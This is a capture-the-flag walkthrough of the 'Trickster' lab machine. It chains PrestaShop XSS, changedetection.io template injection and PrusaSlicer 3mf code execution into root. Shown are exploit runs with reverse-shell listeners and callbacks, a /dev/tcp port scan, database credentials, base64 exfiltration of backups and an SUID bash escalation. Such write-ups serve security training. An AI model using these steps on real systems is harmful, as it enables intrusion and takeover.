Trickster is a medium linux machine created by EmSec. The subdomin shop.trickster.htb uses PrestaShop version 8.1.5 which is vulnerable to CVE-2024-34716 XSS vulnerability which gives us the shell as www-data. The mysql database contains the james hash which is crackable. The docker container is running and port 5000 of docker container is running the changedetection.io version 0.45.20 which is vulnerable to CVE-2024-32651 SSTI vulnerability which allows the RCE. The docker container contains the Backups directory with .br file which contains the adam's credentials. The adam is allowed to execute prusaslicer which is vulnerable to CVE-2023-47268 arbitrary code execution vulnerability which gives us shell as root.
OS
Difficulty
Points
Release Date
Retired Date
Linux
Medium
30
21-09-2024
01-02-2025
Enumeration
Nmap
Started the nmap scan and found ssh and http services running.
The trickster is a online shopping platform where we can shop to all our shopping needs.
VIsiting the contact and shop endpoints, the contact form and shop.trickster.htb subdomain is found.
Add the shop.trickster.htb in /etc/hosts file.
Web - shop.trickster.htb
The subdomain has listed some of the products and we can buy it or add to cart.
The website is made using the prestashop. The prestashop is a open-source software platform to build the e-commerce websites.
Directory enumeration using fuff reveals the .git directory.
Using gitdumper to dump the content in .git directory.
Listing the contents in .git directory reveals the prestashop admin panel path.
The 8.1.5 version of prestashop is vulnerable to XSS via customer contact, the details about the vulnerability is released by prestashop in their github repository.
Foothold
Shell - www-data [ CVE-2024-34716 Exploit ]
The aelmokhtar has published the script in github repository for exploiting the vulnerability. Git clone the repository.
Change directory to CVE-2024-34716 and run the exploit.py.
Lateral Movement
Pillaging - www-data [ user ]
The prestashop config file parameters.php gives us the credentials for mysql database.
Shell - james
Upgrading the shell and using the credentials to login into mysql.
Enumerating the database gives us the james hash which we can use it into ssh.
Cracked the james hash using hashcat.
The user.txt file contains the user flag 👏
Pivoting
Pillaging - james [ user ]
The ps auxreveals that the root is running Docker container and changedetection.py in /datastore directory.
The ip addr reveals the Docker container network interface configuration and its IP address.
The ping sweep is used to find the active and listening ip addresses in docker container. The two ip addresses are active and listening 172.17.0.1 and 172.17.0.2
The port scan finds the 5000 port open.
Pillaging - Port 5000
Curling the 5000 port the changedetection version 0.45.20 service is running in the website.
Port forward the 5000 port via ssh.
The Login page of changedetection.io is presented with password field.
Using the password of james will give us access to the changedetection.
The changedetection is the open source web page change detection, website watcher, restock monitor and notification service. The source code and documentation is found in this githubrepository. The changedetection version <= 0.45.20 is vulnerable to CVE-2024-32651 Server Side Template Injection in Jinja2 which allows the RCE. More details and PoC is found here.
Following the above PoC with below given payloads gives us the shell of root in Docker Container.
Settings > Notification > Insert your payload > click on Send test notification
Don't press the OK in alert it will end the shell.
Pillaging - root [ user - Docker Container ]
Enumerating the /datastore directory, found the Backup directory which contains the zip files.
The nc and unzip is not present in the system.
Shell - adam
I will be using tar to compress the Backups directory and use base64 to convert it into base64.
Copy the outputted base64 text and save it into the file in your local machine. Then decompile the base64 and decompress it using tar.
Change directory into Backups directory and unzipping the first file contains the .br file.
The brotli command is used to decompress the .br file. If not present in your system apt install to get it.
Use the credentials to ssh into the system as adam.
Privilege Escalation
Pillaging - adam [ user ]
The user is allowed to run prusaslicer as a sudo without any password.
The /opt/PrusaSlicer contains the two files, one is prusaslicer binary and another is TRICKSTER.3mf
PrusaSlicer is a popular 3D slicing software designed for FFF (Fused Filament Fabrication) and mSLA (mask Stereolithography) 3D printers. The prusaslicer is vulnerable to CVE-2023–47268 arbitrary code execution through 3mf files. The exploitdb has a PoC for this vulnerability.
Shell - root [ CVE-2023-47268 Exploit ]
1
Move the TRICKSTER.3mf file into your local system because the file belongs to root and we cannot edit it.
2
Extract the file Metadata/Slic3r_PE.config
3
Modify the extracted file for getting shell as root and compress it.
4
Upload the modified TRICKSTER.3mf and execute it with outfile name otherwise it will give the error.
5
Checking whether the /bin/bash has SUID added or not and execute it to get root shell.
Change directory to /root, the root.txt file contains the root flag 🎉
Proof of Concept
The below video provides the PoC of Trickster machine.
python3 exploit.py -h
usage: exploit.py [-h] --url URL --email EMAIL --local-ip LOCAL_IP
--admin-path ADMIN_PATH
CVE-2024-34716 Exploit
options:
-h, --help show this help message and exit
--url URL The Presta Shop base url.
--email EMAIL The email address of admin user.
--local-ip LOCAL_IP Local HTTP Server IP.
--admin-path ADMIN_PATH
The Presta Shop admin path.
python3 exploit.py --url http://shop.trickster.htb --email dexter@mail.com --local-ip 10.10.16.19 --admin-path admin634ewutrx1jgitlooaj
[X] Starting exploit with:
Url: http://shop.trickster.htb
Email: dexter@mail.com
Local IP: 10.10.16.19
Admin Path: admin634ewutrx1jgitlooaj
[X] Ncat is now listening on port 12345. Press Ctrl+C to terminate.
Serving at http.Server on port 5000
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:12345
Ncat: Listening on 0.0.0.0:12345
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Request: GET /ps_next_8_theme_malicious.zip HTTP/1.1
Response: 200 -
10.10.11.34 - - [02/Feb/2025 04:25:54] "GET /ps_next_8_theme_malicious.zip HTTP/1.1" 200 -
GET request to http://shop.trickster.htb/themes/next/reverse_shell_new.php: 403
Ncat: Connection from 10.10.11.34:50560.
Linux trickster 5.15.0-121-generic #131-Ubuntu SMP Fri Aug 9 08:29:53 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
09:26:29 up 18:25, 0 users, load average: 0.02, 0.16, 0.14
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prest@shop_o
Enter password:
ERROR 1044 (42000): Access denied for user 'ps_user'@'localhost' to database 'prest@shop_o'
www-data@trickster:~/prestashop/app/config$ mysql -u ps_user -p prestashop
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 26924
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [prestashop]>
ssh james@10.10.11.34
The authenticity of host '10.10.11.34 (10.10.11.34)' can't be established.
ED25519 key fingerprint is SHA256:SZyh4Oq8EYrDd5T2R0ThbtNWVAlQWg+Gp7XwsR6zq7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.34' (ED25519) to the list of known hosts.
james@10.10.11.34's password:
Last login: Sun Feb 2 04:19:21 2025 from 10.10.14.7
james@trickster:~$
james@trickster:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:73:b3 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.34/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:04:bf:9f:0d brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
209: veth484e19f@if208: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
link/ether 0e:e7:8b:7f:b2:ce brd ff:ff:ff:ff:ff:ff link-netnsid 0
james@trickster:~$ for i in {1..254}; do (ping -c 1 172.17.0.$i | grep ttl &) ; done
64 bytes from 172.17.0.1: icmp_seq=1 ttl=64 time=0.071 ms
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.048 ms
james@trickster:~$ for port in {1..65535}; do echo > /dev/tcp/172.17.0.2/$port && echo "$port open"; done 2>/dev/null
5000 open
nc -lvnp 8443
Listening on 0.0.0.0 8443
Connection received on 10.10.11.34 53796
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@a4b9a36ae7ff:/app#
root@a4b9a36ae7ff:/app# cd /datastore
cd /datastore
root@a4b9a36ae7ff:/datastore# ls
ls
Backups
b86f1003-3ecb-4125-b090-27e15ca605b9
bbdd78f6-db98-45eb-9e7b-681a0c60ea34
secret.txt
url-list-with-tags.txt
url-list.txt
url-watches.json
root@a4b9a36ae7ff:/datastore# cd Backups
cd Backups
root@a4b9a36ae7ff:/datastore/Backups# ls
ls
changedetection-backup-20240830194841.zip
changedetection-backup-20240830202524.zip
root@a4b9a36ae7ff:/datastore/Backups#
root@ae5c137aa8ef:/datastore/Backups# cd ..
cd ..
root@ae5c137aa8ef:/# tar czf datastore.tar.gz Backups/
tar czf datastore.tar.gz Backups/
root@a4b9a36ae7ff:/datastore# base64 datastore.tar.gz -w0
base64 datastore.tar.gz -w0
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User adam may run the following commands on trickster:
(ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer
adam@trickster:~$
adam@trickster:~$ cd /opt/PrusaSlicer
adam@trickster:/opt/PrusaSlicer$ ls
prusaslicer TRICKSTER.3mf
adam@trickster:/opt/PrusaSlicer$
adam@trickster:/opt/PrusaSlicer$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
wget http://10.10.11.34:8000/TRICKSTER.3mf
--2025-02-03 01:35:54-- http://10.10.11.34:8000/TRICKSTER.3mf
Connecting to 10.10.11.34:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 138526 (135K) [application/vnd.ms-3mfdocument]
Saving to: ‘TRICKSTER.3mf’
TRICKSTER.3mf 100%[========================================================================================>] 135.28K 37.6KB/s in 3.6s
2025-02-03 01:35:59 (37.6 KB/s) - ‘TRICKSTER.3mf’ saved [138526/138526]
zip -u TRICKSTER.3mf Metadata/Slic3r_PE.config
updating: Metadata/Slic3r_PE.config
zip warning: Local Entry CRC does not match CD: Metadata/Slic3r_PE.config
(deflated 69%)
